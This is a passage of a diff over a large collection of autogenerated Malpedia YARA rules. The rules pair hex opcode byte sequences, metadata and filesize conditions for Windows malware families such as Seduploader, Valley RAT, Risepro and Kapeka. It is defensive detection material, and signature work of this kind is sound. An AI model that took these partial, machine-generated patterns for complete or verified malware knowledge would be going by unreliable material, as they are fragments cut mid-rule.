-		$sequence_2 = { 0f84e0000000 b8???????? 8d4c243c 660f1f440000 8a11 3a10 751a }
-		$sequence_3 = { 8b550c 83ec20 33c9 8bc1 3914c590051d13 7408 40 }
-		$sequence_4 = { 3bf3 720e 4e 42 0fb606 80b830841e1300 74e9 }
-		$sequence_5 = { 238890bb1e13 03c5 3d00080000 72f1 230d???????? 094c2424 094c2428 }
-		$sequence_6 = { ba???????? b9???????? 8d85f4fbffff 0f45ca 51 68???????? 68???????? }
-		$sequence_7 = { 8b0d???????? a3???????? 894c2414 85c9 0f846b010000 6a10 8d4c2414 }
-		$sequence_8 = { ff15???????? 68???????? 8d85d0feffff 50 ff15???????? 8d8550faffff c78564faffff00000000 }
-		$sequence_9 = { c60000 0f57c0 660fd64704 8d45a4 c645fc03 50 8d4f10 }
+		$sequence_0 = { 663bcf 75f5 2bc6 d1f8 740c 8b45fc 8b08 }
+		$sequence_1 = { 51 8d4dd4 e8???????? 8b45e4 }
+		$sequence_2 = { 8b45e0 7303 8d45e0 6a00 6a00 6a03 }
+		$sequence_3 = { 40 84c9 75f9 2b45cc }
+		$sequence_4 = { 51 e8???????? 8bf8 8bc6 83c404 8d5001 8d9b00000000 }
+		$sequence_5 = { ff15???????? 85c0 78d8 8b45fc 8b550c 8b08 }
+		$sequence_6 = { 64a300000000 8bf1 8975f0 c706???????? c745fc01000000 8b4608 }
+		$sequence_7 = { 33d2 3955f0 0f94c2 837df410 8bf2 720c }
+		$sequence_8 = { 8b4dfc 33cd e8???????? 8be5 5d c20400 837df408 }
+		$sequence_9 = { 50 8d45e0 50 e8???????? 837df408 8b45e0 7303 }
 
 	condition:
-		7 of them and filesize < 23088128
+		7 of them and filesize < 671744
 }
-rule MALPEDIA_Win_Taleret_Auto : FILE
+rule MALPEDIA_Win_Stormwind_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6be6a0df-09b4-53be-b501-12f03fd91cf1"
+		id = "80614d8b-8924-5b45-b8c5-f7daeb22acc2"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.taleret"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.taleret_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stormwind"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.stormwind_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "544f42faf26ff7a7e8e3048971242e57a62e785dd2bacb3cb794d982726af564"
+		logic_hash = "1831a86c13bffd90b9334f0a5afcc717f00e9aac3ae8337459965aab192d5d98"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138560,34 +139044,34 @@ rule MALPEDIA_Win_Taleret_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 742a 8d4c2434 e8???????? 8d4c2434 c684247016000001 }
-		$sequence_1 = { bf00f34084 ff15???????? 83c40c 85c0 }
-		$sequence_2 = { 8d842458020000 8d4c2420 50 68???????? 51 e8???????? 83c40c }
-		$sequence_3 = { 8b442414 85c0 0f84b4000000 8b4c2410 03f0 2bc8 }
-		$sequence_4 = { e8???????? 8d4c2430 c68424a80300000c e8???????? 8d4c2424 c68424a80300000b e8???????? }
-		$sequence_5 = { 33f6 68???????? 89742444 e8???????? }
-		$sequence_6 = { ff15???????? eb1e 83f905 7519 8b4301 8d542420 50 }
-		$sequence_7 = { 83e003 8b74242c c1e006 0bd8 }
-		$sequence_8 = { 03f2 03c6 25ff000000 50 51 68???????? a3???????? }
-		$sequence_9 = { 8b6c2418 8b4c242c 3bcd 0f8df5000000 2be9 }
+		$sequence_0 = { ff5004 8b36 3b37 75eb 68f4010000 8d4708 }
+		$sequence_1 = { f30f6f40e0 660ff9c1 f30f7f4407e0 3b55f4 7cd5 8b7df0 3bd6 }
+		$sequence_2 = { 83c40c eb02 33ff ff7508 }
+		$sequence_3 = { 6a00 8906 e8???????? 8945d0 8d45d0 50 }
+		$sequence_4 = { c20400 55 8bec 668b4d0e baf07f0000 668bc1 }
+		$sequence_5 = { e8???????? 8d4df0 83c404 3bc8 7408 8b30 }
+		$sequence_6 = { 4a 8955fc 81fa00010000 7309 0fb6b2e0f90310 eb0c 8bca }
+		$sequence_7 = { 64a300000000 8bf9 897c241c 8b471c 8b08 }
+		$sequence_8 = { 85db 7410 ff75e8 6a00 53 e8???????? }
+		$sequence_9 = { 8d45f4 64a300000000 8bf9 8d4dec c745e400000000 e8???????? c745fc00000000 }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 741376
 }
-rule MALPEDIA_Win_Stration_Auto : FILE
+rule MALPEDIA_Win_Graphdrop_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a114ca5f-e8f5-5b6c-8d4b-c8b226c24232"
+		id = "24fb95a1-20eb-59d2-a21c-2ae5bcca80f7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stration"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.stration_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphdrop"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.graphdrop_auto.yar#L1-L108"
 		license_url = "N/A"
-		logic_hash = "810e080388d75ad01155fee822907ac9d5b404fa94d6259fc807c41db11a9cc8"
+		logic_hash = "7950fd3d879183156c1cd9194f7d7f790283d1f02a5c57bd2f302dbba8044501"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -138599,34 +139083,34 @@ rule MALPEDIA_Win_Stration_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 8d54240c 52 33f6 56 8d442418 50 }
-		$sequence_1 = { a1???????? 80f253 83ec24 85c0 8815???????? }
-		$sequence_2 = { c744241000000000 eb0c 8a0d???????? 880d???????? 6a01 56 }
-		$sequence_3 = { 52 e8???????? a3???????? 8b4c2420 51 }
-		$sequence_4 = { ba11010000 8bce e8???????? c705????????00000000 }
-		$sequence_5 = { 8b15???????? 89442404 a1???????? 894c2408 8a0d???????? 89442410 8954240c }
-		$sequence_6 = { 8bff 8a1404 8a4c240c 32d1 881404 40 83f80d }
-		$sequence_7 = { 8a1404 8a4c240c 32d1 881404 }
-		$sequence_8 = { 8d8c24b4000000 51 33f6 e8???????? }
-		$sequence_9 = { 83f825 7cec 8b3d???????? 68???????? }
+		$sequence_0 = { 52 4156 415e 5a }
+		$sequence_1 = { 4155 49c7c501000000 4150 4152 415a }
+		$sequence_2 = { 53 0f77 5b 90 }
+		$sequence_3 = { 90 415f 90 415d }
+		$sequence_4 = { 49c7c501000000 4150 4152 415a 4158 }
+		$sequence_5 = { 0f77 4157 90 415f }
+		$sequence_6 = { 415b 50 0f77 4155 }
+		$sequence_7 = { 58 e9???????? 53 48c7c303000000 }
+		$sequence_8 = { 4155 49c7c501000000 4150 4152 415a 4158 }
+		$sequence_9 = { 50 90 53 0f77 }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 4186112
 }
-rule MALPEDIA_Win_Seduploader_Auto : FILE
+rule MALPEDIA_Win_Valley_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "abd18501-c80d-5d3c-830d-4070c5a4c096"
+		id = "5dc86c73-fc1a-55cb-84b1-f3d8a7354032"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.seduploader_auto.yar#L1-L109"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.valley_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.valley_rat_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "ad39ca6734688a1ba0a401112f23db476ff01fef94039db8596308ec3fce36d4"
-		score = 75
-		quality = 75
+		logic_hash = "cd2ba628443a3060bd3912a9438622a07d0947ed73efff5cb92a491d2061eff0"
+		score = 60
+		quality = 45
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -138638,32 +139122,32 @@ rule MALPEDIA_Win_Seduploader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff763c e8???????? 83c40c 3b4508 }
-		$sequence_1 = { 50 e8???????? 8b4510 83c6fe 8930 }
-		$sequence_2 = { 83c6fe 8930 8d4601 50 e8???????? }
-		$sequence_3 = { 83c6fe 8930 8d4601 50 }
-		$sequence_4 = { e8???????? 6a01 8d45fe 50 }
-		$sequence_5 = { e8???????? 8b4510 83c6fe 8930 }
-		$sequence_6 = { c3 56 6a3e 8bf1 e8???????? }
-		$sequence_7 = { 89b5ecfeffff 89b5f0feffff 89b5f4feffff e8???????? 83c40c }
-		$sequence_8 = { 50 e8???????? 8b4510 83c6fe }
-		$sequence_9 = { e8???????? 8b4510 83c6fe 8930 8d4601 }
+		$sequence_0 = { c20800 53 6a00 6a00 }
+		$sequence_1 = { 5d c20800 53 6a00 6a00 }
+		$sequence_2 = { 8be5 5d c20800 53 6a00 }
+		$sequence_3 = { e8???????? 8be5 5d c20800 53 6a00 }
+		$sequence_4 = { e8???????? 8be5 5d c20800 53 6a00 6a00 }
+		$sequence_5 = { 8be5 5d c20800 53 6a00 6a00 }
+		$sequence_6 = { 33cd e8???????? 8be5 5d c20800 53 6a00 }
+		$sequence_7 = { c745c400000000 e8???????? f6c302 740b 8d8d08ffffff e8???????? 8b5dc0 }
+		$sequence_8 = { f30f6f05???????? f30f7f45a8 f30f6f05???????? f30f7f45b8 f30f6f05???????? f30f7f45c8 f30f7e05???????? }
+		$sequence_9 = { 8d45e4 bb03000000 50 8d4dc4 e8???????? 50 8d45d4 }
 
 	condition:
-		7 of them and filesize < 401408
+		7 of them and filesize < 2256896
 }
-rule MALPEDIA_Win_Electric_Powder_Auto : FILE
+rule MALPEDIA_Win_Pitou_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1eede688-bf8f-5498-af13-fe892853a3bd"
+		id = "d3bdfc17-2f62-5214-be4f-5a36d3b3ac21"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.electric_powder"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.electric_powder_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pitou"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pitou_auto.yar#L1-L113"
 		license_url = "N/A"
-		logic_hash = "fd0dece583cd040033ee5a2fac814b92bb57f2cacae42d60f0a3caee41692c62"
+		logic_hash = "7616b15e54bbcbd8174c3b9ed1b89eebeb0789927a8a07e3c44e1d6842f140f7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138677,32 +139161,32 @@ rule MALPEDIA_Win_Electric_Powder_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 e8???????? 8bf0 83c404 85f6 0f84f4000000 8b8d40efffff }
-		$sequence_1 = { e8???????? 8d8d70fbffff c645fc4e 51 8bd0 8d8d30fcffff e8???????? }
-		$sequence_2 = { 8d85d8f9ffff 83c418 8985dceeffff 6a0c 8d85d4eeffff 50 }
-		$sequence_3 = { 6a02 52 56 8bcb ff5508 8bc8 ebe1 }
-		$sequence_4 = { 8d4738 50 51 8d8d98efffff }
-		$sequence_5 = { 2bc2 8955fc 83f801 0f82ff000000 8b7e14 8d5a01 83cb0f }
-		$sequence_6 = { 8bc1 57 8b5e10 2bc3 895df8 3bc2 0f82e9000000 }
-		$sequence_7 = { 8bce 50 e8???????? 84c0 7511 5e c70301000000 }
-		$sequence_8 = { c6854fefffff00 8d8d80efffff e8???????? 8a854fefffff 8b4df4 64890d00000000 59 }
-		$sequence_9 = { 8d3400 8945e8 56 51 8d45d8 50 e8???????? }
+		$sequence_0 = { 80e703 c0eb05 80e303 80ff00 }
+		$sequence_1 = { 8bc2 5e 5a 59 5b }
+		$sequence_2 = { ac 8bda c1e305 03c3 8bda c1eb02 }
+		$sequence_3 = { 33c0 ac 8bda c1e305 03c3 8bda }
+		$sequence_4 = { c1e305 03c3 8bda c1eb02 03c3 }
+		$sequence_5 = { 03c3 8bda c1eb02 03c3 }
+		$sequence_6 = { 8a6201 80f457 8acc 80e103 8aec }
+		$sequence_7 = { 8a6201 80f457 8acc 80e103 8aec c0ed03 }
+		$sequence_8 = { 53 80ef18 80ff10 5b }
+		$sequence_9 = { 8acc 80e103 8aec c0ed03 }
 
 	condition:
-		7 of them and filesize < 565248
+		7 of them and filesize < 1106944
 }
-rule MALPEDIA_Win_Dorkbot_Ngrbot_Auto : FILE
+rule MALPEDIA_Win_Risepro_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "59e43108-0eea-5a85-94be-e4f2f553739a"
+		id = "dda5214f-af54-5ca2-a7cc-1bcc410f868f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorkbot_ngrbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dorkbot_ngrbot_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.risepro"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.risepro_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "e7e0ed048f71ac1a9fd0b9da304618de36953790efcba8c3991a4e9c9121ea29"
+		logic_hash = "d29313e60d544119ebfa72aa2a82b5ab903014cb2fa565cd9721952588d526d1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138716,32 +139200,32 @@ rule MALPEDIA_Win_Dorkbot_Ngrbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3b5dfc 72c5 5f 33c0 5b 8be5 5d }
-		$sequence_1 = { 33f6 68ff030000 8d85e9fbffff 56 50 8975fc }
-		$sequence_2 = { 56 e8???????? 85c0 7503 5e 5d c3 }
-		$sequence_3 = { 68???????? 56 ff15???????? 8b3d???????? 50 ffd7 }
-		$sequence_4 = { 68???????? 68???????? 68???????? e8???????? 83c414 eb49 ff15???????? }
-		$sequence_5 = { 51 6a05 68???????? 52 e8???????? 50 ff15???????? }
-		$sequence_6 = { 83c408 3bd8 5b 0f8283000000 68???????? e8???????? }
-		$sequence_7 = { 85c0 7411 2bc2 83e805 894101 c601e9 b805000000 }
-		$sequence_8 = { 6a40 6800300000 50 53 51 8945f4 }
-		$sequence_9 = { 50 e8???????? 83c404 85c0 7e14 8b4cbe10 51 }
+		$sequence_0 = { 0fb695e4feffff 52 0fb685e3feffff 50 0fb68de2feffff }
+		$sequence_1 = { 0fb655ff 52 8b450c 50 8b4d08 51 8b4df8 }
+		$sequence_2 = { eb0d 6a64 ff15???????? e9???????? 8b4df4 }
+		$sequence_3 = { e8???????? 50 ba0f000000 8b4dbc e8???????? 8945d4 8b4dd8 }
+		$sequence_4 = { 8b049500ef4100 f644082801 7422 8d4508 8975f8 8945f4 8d4dff }
+		$sequence_5 = { 8b4dd8 e8???????? 8b45f4 8b4df8 8908 eb27 8b5514 }
+		$sequence_6 = { 8d5584 52 8d4dbc e8???????? 8b00 89459c 8d4d80 }
+		$sequence_7 = { 8b4d0c e8???????? 8b4dfc e8???????? 8b45fc 8be5 5d }
+		$sequence_8 = { 6a00 8d4b08 e8???????? 33c9 884db7 }
+		$sequence_9 = { 8945dc 8b4d08 e8???????? 8bd0 8d4de7 e8???????? }
 
 	condition:
-		7 of them and filesize < 638976
+		7 of them and filesize < 280576
 }
-rule MALPEDIA_Win_Vermilion_Strike_Auto : FILE
+rule MALPEDIA_Win_Kapeka_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0cca6268-ed67-5b5d-8d1e-c4b1c4763f8b"
+		id = "e9faddcc-105b-5a04-b8c8-ec1325abdf07"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vermilion_strike"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vermilion_strike_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kapeka"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kapeka_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "ffc8a6cd25f24a5bbb4ecf81a74aa2be97f9696d5656c7bc8cb3391d29c69c5d"
+		logic_hash = "f9f8a4abde4cdfc67b53dadf6bbb3bb8155ff6c1c3c5e817a852cd16859c5b00"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138755,32 +139239,32 @@ rule MALPEDIA_Win_Vermilion_Strike_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 03c1 a3???????? e9???????? 8b5608 42 52 e8???????? }
-		$sequence_1 = { 8b6f04 eb03 8d6f04 8b15???????? 8b7f1c 6880ee3600 }
-		$sequence_2 = { 68???????? c644241806 e8???????? 68???????? c644241807 e8???????? b8???????? }
-		$sequence_3 = { 50 c744241001000000 e8???????? 8b8c24c4000000 8b9424c0000000 51 52 }
-		$sequence_4 = { 2bf8 8b4c2418 57 8db424fc000000 8d942418010000 e8???????? }
-		$sequence_5 = { 83c508 55 e8???????? 83c404 55 8bf0 6a00 }
-		$sequence_6 = { 50 56 eb06 53 68???????? 8d442454 e8???????? }
-		$sequence_7 = { 53 e8???????? 83c404 8d742e08 eb7d 0fb64c3704 0fb6543705 }
-		$sequence_8 = { 8b442420 8b7c2424 3bfb 7544 8b542428 8b5e14 }
-		$sequence_9 = { 750c c705????????01000000 eba9 83f808 75a4 c705????????04000000 eb98 }
+		$sequence_0 = { 448b642424 be16000000 448d76eb 488b4b70 488d542420 488b01 }
+		$sequence_1 = { 488bd8 e8???????? 488d8c2480000000 4533c9 48894c2428 4533c0 498b0e }
+		$sequence_2 = { 4885c0 0f8422050000 4889b42460010000 4c8d2d71a10000 498bcd 4c89a42470010000 4c89bc2430010000 }
+		$sequence_3 = { 397537 7549 0f1045d7 0f1145e7 488b4de7 6690 0fb701 }
+		$sequence_4 = { 44335e08 4533da 4133fb 44895840 448bd7 897844 4533d1 }
+		$sequence_5 = { c744242019010200 4c8d451f 48c7c102000080 488d55f7 e8???????? }
+		$sequence_6 = { 48f7e1 8bc7 48c1ea1f 480fafd7 482bca 2bc1 4181f8fdffff7f }
+		$sequence_7 = { 488bd9 488901 33ff 488b4928 4885c9 740a }
+		$sequence_8 = { 4885c9 7406 ff15???????? 488b5e18 488d4e20 e8???????? 488bd3 }
+		$sequence_9 = { 41b802000000 488d95b0010000 488d8d00010000 e8???????? 488d8d28010000 e8???????? 488d0dc0650100 }
 
 	condition:
-		7 of them and filesize < 540672
+		7 of them and filesize < 377856
 }
-rule MALPEDIA_Win_Lockfile_Auto : FILE
+rule MALPEDIA_Win_Tonedeaf_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "06969e31-f5a2-5625-9b28-348da0894916"
+		id = "15deba33-5fb4-592a-90c3-bca364871ec1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockfile"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lockfile_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tonedeaf"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tonedeaf_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "ccc239fdec0009df6e27636b6ceb3da4ca587bf03dbd6e51ebddd7a3a56ef524"
+		logic_hash = "7f00488f24cf89d345c0d8aa4f5fd46f86ca2b90c3b462b66a07f10b957268c4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138794,34 +139278,34 @@ rule MALPEDIA_Win_Lockfile_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488bc3 eb02 33c0 488b5c2440 488b6c2448 488b742450 488b7c2458 }
-		$sequence_1 = { c6856401000069 c685650100003f c685660100003d c6856701000020 c685680100003f c6856901000029 c6856a0100003e }
-		$sequence_2 = { 740b 488b01 ba01000000 ff10 90 4c897dd8 488b4dc8 }
-		$sequence_3 = { 4883ec20 488bd9 ba60000000 b958000000 488b4360 48394358 0f42d1 }
-		$sequence_4 = { 498b4210 4c3bc1 4983d700 48f76328 4f8d343c 488bf2 498d0c00 }
-		$sequence_5 = { 498d0c01 498b4528 493bc9 4983d400 49f76328 4f8d3427 488bf2 }
-		$sequence_6 = { 4883fa10 7203 488b07 488d1c08 41b817000000 488d15605f0600 488bcb }
-		$sequence_7 = { 4883d200 4c03e2 4889559f 48f76648 498d0c00 498b4348 493bc8 }
-		$sequence_8 = { 8b4510 0416 346d 88452a 8b4510 0417 3465 }
-		$sequence_9 = { 4833c4 48898590010000 4c8bad08020000 0f57c0 0f1185b0000000 0f1185c0000000 0f1185d0000000 }
+		$sequence_0 = { 33c0 660fd645d4 33db 8945d8 895dd4 }
+		$sequence_1 = { 8b5004 8d4af8 898c153cffffff 8d45a8 c745fc01000000 }
+		$sequence_2 = { 33db 8945d8 895dd4 8945dc }
+		$sequence_3 = { 75f3 8bf3 8a03 43 }
+		$sequence_4 = { 50 6a01 6a6b 57 ff15???????? }
+		$sequence_5 = { 50 6a01 6a6b 57 }
+		$sequence_6 = { 8d7601 884c32ff 84c9 75f3 8bf3 }
+		$sequence_7 = { 0f57c0 c745dc00000000 33c0 660fd645d4 33db 8945d8 }
+		$sequence_8 = { 0f57c0 c745dc00000000 33c0 660fd645d4 33db 8945d8 895dd4 }
+		$sequence_9 = { 2bc6 83f801 732f 8b0f 8bc1 2bc6 48 }
 
 	condition:
-		7 of them and filesize < 1163264
+		7 of them and filesize < 851968
 }
-rule MALPEDIA_Win_Purplewave_Auto : FILE
+rule MALPEDIA_Win_Red_Gambler_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a8fab1de-de14-5b36-888a-a891d75c38a4"
+		id = "48807a37-e904-5314-8d0b-afd101b942b7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.purplewave"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.purplewave_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_gambler"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.red_gambler_auto.yar#L1-L307"
 		license_url = "N/A"
-		logic_hash = "ec1dbe620cafbb0b6c5ed6f89052ebc62f770f57ab87864e785a226f41ace5e3"
+		logic_hash = "5df98b37982fcd6fe80d2e1e665e4de08feffa39ad75db51ff52df159597061f"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -138833,32 +139317,54 @@ rule MALPEDIA_Win_Purplewave_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7c37 8a16 8bc7 80fa39 7f2e 0fbe07 8d4f01 }
-		$sequence_1 = { 8b0495201e4900 885c012e 8b0495201e4900 804c012d04 46 ebb0 ff15???????? }
-		$sequence_2 = { e8???????? 6a13 e8???????? 8bf0 59 6a17 c7063519ef54 }
-		$sequence_3 = { 85c0 754c 8b45ec 85c0 7445 33c9 6a02 }
-		$sequence_4 = { e8???????? 50 8d8d08ffffff e8???????? 81cb00000100 ffb52cffffff 8d8508ffffff }
-		$sequence_5 = { 8bcc 68???????? 8937 e8???????? 8bcf e8???????? 84c0 }
-		$sequence_6 = { 8903 894624 e8???????? c20800 6a64 b8???????? e8???????? }
-		$sequence_7 = { 6a02 8955ec 8b0485201e4900 5f 894df4 c644032b0a 8b5d08 }
-		$sequence_8 = { 50 e8???????? 83c40c 8d4d88 e8???????? 8d0477 }
-		$sequence_9 = { 8bc3 e8???????? c20c00 807f4900 740d 8d4f10 51 }
+		$sequence_0 = { 7418 8b95f0feffff 52 8d85f8feffff 50 ff15???????? }
+		$sequence_1 = { 75eb 891e 57 6a00 ff15???????? 50 ff15???????? }
+		$sequence_2 = { 8d5605 56 c645ece9 894ded }
+		$sequence_3 = { 803e20 753b 807e01a2 7535 807e02c3 }
+		$sequence_4 = { ff15???????? 6800010000 56 68???????? e8???????? a1???????? 83c40c }
+		$sequence_5 = { 807801c3 7523 6800010000 50 }
+		$sequence_6 = { 61 8b35???????? 81c6201a0000 ffd6 }
+		$sequence_7 = { 668985f0f8ffff ffd6 50 8d95f2f8ffff }
+		$sequence_8 = { 0e 6706 7e0e 2829 dc03 dc692c 64f33c87 }
+		$sequence_9 = { 93 ee b4ed 2f 2326 50 0f41631c }
+		$sequence_10 = { 9e 54 50 4c 48 44 }
+		$sequence_11 = { 8d8598fdffff 50 68???????? 8d8d98fbffff 68???????? }
+		$sequence_12 = { 6800010000 8d8dfcfdffff 51 6a00 }
+		$sequence_13 = { ff15???????? 8d8594fbffff 50 8d4d98 51 ff15???????? }
+		$sequence_14 = { 8d8d98fbffff 68???????? 51 ff15???????? 83c414 6a00 }
+		$sequence_15 = { 7364 42 e5e1 5f }
+		$sequence_16 = { e600 3e3e25162f062d 2b2a bee7eee947 }
+		$sequence_17 = { 09afba55a367 59 2f 74be }
+		$sequence_18 = { ff15???????? 83c414 6a00 6a00 8d9598fbffff 52 68???????? }
+		$sequence_19 = { 6800010000 8d85fcfeffff 50 6a00 ff15???????? }
+		$sequence_20 = { 7bce 07 93 60 58 0e 4c }
+		$sequence_21 = { cd50 d46e c8603b8d 6e }
+		$sequence_22 = { 8d9598fbffff 52 68???????? 6a00 6a00 ff15???????? 8b4dfc }
+		$sequence_23 = { ff15???????? 6800010000 8d8d98fdffff 51 8d9598feffff 52 ff15???????? }
+		$sequence_24 = { 8d4d98 51 ff15???????? 8d5598 52 8d8598fdffff }
+		$sequence_25 = { 8d8c05fcfeffff 51 8d95fcfeffff 52 }
+		$sequence_26 = { 6a5c 8d8dfcfeffff 51 ff15???????? 8d9405fcfeffff }
+		$sequence_27 = { 8b4508 ff34c5d0814000 ff15???????? 5d c3 6a0c }
+		$sequence_28 = { e8???????? 68???????? ff15???????? 8b7508 c7465c486b4000 83660800 33ff }
+		$sequence_29 = { 8945e4 83f805 7d10 668b4c4310 66890c4580974000 }
+		$sequence_30 = { 55 8bec 8b4508 33c9 3b04cd10804000 7413 41 }
+		$sequence_31 = { 8bd8 ffd7 8b3d???????? 6aff ffd7 ffd3 }
 
 	condition:
-		7 of them and filesize < 1400832
+		7 of them and filesize < 327680
 }
-rule MALPEDIA_Win_Lethic_Auto : FILE
+rule MALPEDIA_Win_Gup_Proxy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ecf699d4-037c-58b3-a572-a126b8291661"
+		id = "83d0d192-73f0-5c37-84a4-96599a03dd8c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lethic"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lethic_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gup_proxy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gup_proxy_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "0a37e4703a880069257b89a7948a47634d1bc51105338bac97b952539891efa4"
+		logic_hash = "cd4745a85ea3e99fe6039df895795db2fbf4a6914277daa87672debc92efc3be"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138872,32 +139378,32 @@ rule MALPEDIA_Win_Lethic_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
